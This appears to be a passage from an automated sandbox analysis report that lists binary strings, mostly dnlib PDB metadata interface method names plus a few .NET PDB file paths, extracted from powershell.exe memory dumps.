Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B82B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
